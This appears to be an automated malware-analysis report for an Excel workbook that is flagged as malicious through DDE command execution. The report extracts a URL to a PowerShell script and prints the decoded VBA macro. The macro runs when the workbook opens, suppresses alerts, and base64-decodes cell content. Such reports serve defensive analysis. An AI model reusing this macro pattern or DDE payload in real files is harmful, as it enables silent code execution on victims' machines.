MALICIOUS
190
Risk Score
Heuristics 6
-
ClamAV: Xml.Exploit.DDE_Abuse-9987933-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xml.Exploit.DDE_Abuse-9987933-1
-
Spreadsheet DDE link launches a dangerous command critical OOXML_SPREADSHEET_DDE_MALICIOUSExcel workbook contains an externalLinks/ddeLink entry whose ddeService/ddeTopic launches a dangerous executable. This is SpreadsheetML DDE command execution, distinct from WordprocessingML DDE field instructions.
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
With CreateObject("Microsoft.XMLDOM").createElement("baysesixtyfor") -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://192.168.1.17/test.ps1 In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1207 bytes |
SHA-256: 79d1f1a8bb79fff7444b34389dbbc0a9c5559ed441fd8ac72e0e441aeeab4462 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function DB64(baysesixtyfor$)
Dim base
With CreateObject("Microsoft.XMLDOM").createElement("baysesixtyfor")
.DataType = "bin.base64": .text = baysesixtyfor
base = .nodeTypedValue
End With
With CreateObject("ADODB.Stream")
.Open: .Type = 1: .Write base: .Position = 0: .Type = 2: .Charset = "utf-8"
DB64 = .ReadText
.Close
End With
End Function
Private Sub Workbook_Open()
Dim PatayinAngAlert As Boolean
PatayinAngAlert = False
Application.DisplayAlerts = PatayinAngAlert
Range("A1").Value = DB64(Range("A1").Value)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 15872 bytes |
SHA-256: 5735162aad2199d175a654747ab2f15a14e9ed9cf7084c721708bccacdfcce6f |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.